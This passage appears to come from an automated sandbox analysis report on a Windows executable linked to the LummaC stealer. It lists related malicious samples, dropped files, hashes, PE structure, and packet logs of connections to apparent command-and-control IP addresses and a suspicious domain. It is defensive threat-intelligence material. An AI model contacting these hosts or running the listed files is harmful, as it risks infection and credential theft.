	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
home.fortth14ht.top	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	3.218.7.103
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	50.17.226.153
REDSERVICIOES	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Set-up.exe	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\LummaC2.exe	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YrxiR3yCLm.exe.log

Download File

Process:	C:\Users\user\Desktop\YrxiR3yCLm.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\LummaC2.exe

Download File

Process:	C:\Users\user\Desktop\YrxiR3yCLm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299520
Entropy (8bit):	6.860310132420335
Encrypted:	false
SSDEEP:	6144:R5s/zt4HV88/rCatOZFABeDUbLv0uC8r9qMq2E9ND43F+ZnSi4:8rtsVPrNMG9qwENs8ZJ4
MD5:	607000C61FCB5A41B8D511B5ED7625D4
SHA1:	DFAA2BFEA8A51B14AC089BB6A39F037E769169D1
SHA-256:	C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
SHA-512:	64940F02635CCBC2DCD42449C0C435A6A50BD00FA93D6E2E161371CDC766103EF858CCBAAE4497A75576121EA7BC25BA54A9064748F9D6676989A4C9F8B50E58
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Joe Sandbox View:	Filename: Cph7VEeu1r.exe, Detection: malicious, Browse Filename: 3stIhG821a.exe, Detection: malicious, Browse Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...xZig............................ .............@..........................P............@.....................................................................(9...................................................................................text............................... ..`.rdata... ......."..................@..@.data...L....0...P..................@....reloc..(9.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\YrxiR3yCLm.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: Cph7VEeu1r.exe, Detection: malicious, Browse Filename: 3stIhG821a.exe, Detection: malicious, Browse Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.981338822237989
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	YrxiR3yCLm.exe
File size:	6'213'120 bytes
MD5:	8e9ea8e0e87ddaecdbb57823ead16033
SHA1:	55a9f08b8cb50a2712f74ade216571f823c0a1fd
SHA256:	aea1e74825e2d187e04a81bb5ce56593f5769c4b86218e5fc820d900801abdb4
SHA512:	340318b2a5e170e886161cfb4576beb6dac2f478dc872c29d89be549c1dc29ed9c612540e4c14b004910d139c490f5f0a235f150fa91cb2c62f66c0e12f6a9bb
SSDEEP:	98304:h2VWpbVhslST57nFGCGpNjLr9Bp7QSL4Jfgvklfl3ayZbaShUbO5kuNEJ/e6BiM:h2VWalSFLJG73rGgMJl3baE3iJmei
TLSH:	B556339C82427899C51FD3B63481982EAF566BC183C35A7DE1C167A01DE3BBFC65E087
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................<m.............. ...`m...@.. ..............................<._...@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xf3c000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676D92AB [Thu Dec 26 17:30:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F11751BB0AAh
shrd dword ptr [esi+00h], ebx, 00000000h
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov ch, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d8055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d6000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d81f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x6d4000	0x43d600	89fcaad064c7f85abebbb4dc83f9de5f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d6000	0x53c	0x400	ac737184b5d741174f999ad2d38a42cf	False	0.6826171875	data	5.650225847414905	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6d8000	0x2000	0x200	6e9890d240b48e1a4145e7c2679977e3	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6da000	0x2b4000	0x200	0781a7f30b2244f7d26110ffc23e0a6b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tmjadsgk	0x98e000	0x1ac000	0x1aaa00	c3587093410a965137e93c773aa22d27	False	0.9948250485276883	data	7.954441008809738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
txnjkebe	0xb3a000	0x2000	0x400	6ca1a4a60f3eba20c8218a3b783047c3	False	0.73046875	data	5.85132559964452	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xb3c000	0x4000	0x2200	de5dd31a45e68c04cef3763a80e92440	False	0.0646829044117647	DOS executable (COM)	0.6910748193485776	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb384bc	0x244	data			0.4689655172413793
RT_MANIFEST	0xb38700	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:56:37.507134914 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:37.507155895 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:37.507222891 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:37.510974884 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:37.510986090 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.375756025 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.389420986 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:39.389458895 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.390994072 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.391135931 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:39.392608881 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:39.392690897 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.439667940 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:39.439719915 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.474962950 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:39.515336990 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.804394007 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.804933071 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:39.804977894 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:39.808435917 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 08:56:39.808454037 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 08:56:52.666701078 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.786488056 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.786633015 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.787847996 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.907520056 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907546997 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907645941 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907665014 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907756090 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907756090 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.907821894 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.907823086 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907860994 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.907939911 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907960892 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.907980919 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.908001900 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.908082962 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.908112049 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:52.908127069 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:52.908149958 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.027390003 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.027425051 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.027498960 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.027545929 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.027550936 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.027590990 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.027650118 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.027688980 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.027718067 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.027756929 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.027761936 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.027806997 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.070904016 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.071175098 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.190798998 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.191040993 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.230983019 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.231153965 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.350725889 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.350878954 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.511006117 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.511173964 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.710987091 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.711047888 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.844645977 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.845005035 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.845105886 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.964561939 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.964668989 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.964679956 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.964709997 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.964764118 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.964771986 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.964813948 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.964876890 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.964920044 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.964936018 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.964994907 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965017080 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965043068 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965071917 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965101957 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965125084 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965166092 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965177059 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965219021 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965238094 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965272903 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965282917 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965342999 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965357065 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965415955 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965419054 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.965452909 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965569973 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965698004 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965801954 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965848923 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965907097 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.965993881 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966068029 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966111898 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966181040 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966240883 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966351032 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966370106 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.966413021 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966413975 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.966460943 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.966507912 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966567039 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.966624022 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966674089 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966676950 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.966731071 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:53.966766119 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:53.966825962 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.006977081 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.007116079 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.084780931 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.084800005 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.084811926 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.084878922 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.084919930 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.084935904 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.085000038 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085064888 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085098028 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085222960 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085300922 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085335970 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085392952 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085494041 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085504055 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085624933 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085644007 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085839987 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085860014 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.085880041 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086214066 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086261988 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086324930 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086365938 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086395979 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086419106 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086451054 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086488962 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086499929 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086549044 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086559057 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086627007 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086684942 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086698055 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086708069 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086725950 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086735964 CET	80	49733	185.121.15.192	192.168.2.4
Dec 27, 2024 08:56:54.086745024 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086791992 CET	49733	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:54.086801052 CET	80	49733	185.121.15.192	192.168.2.4
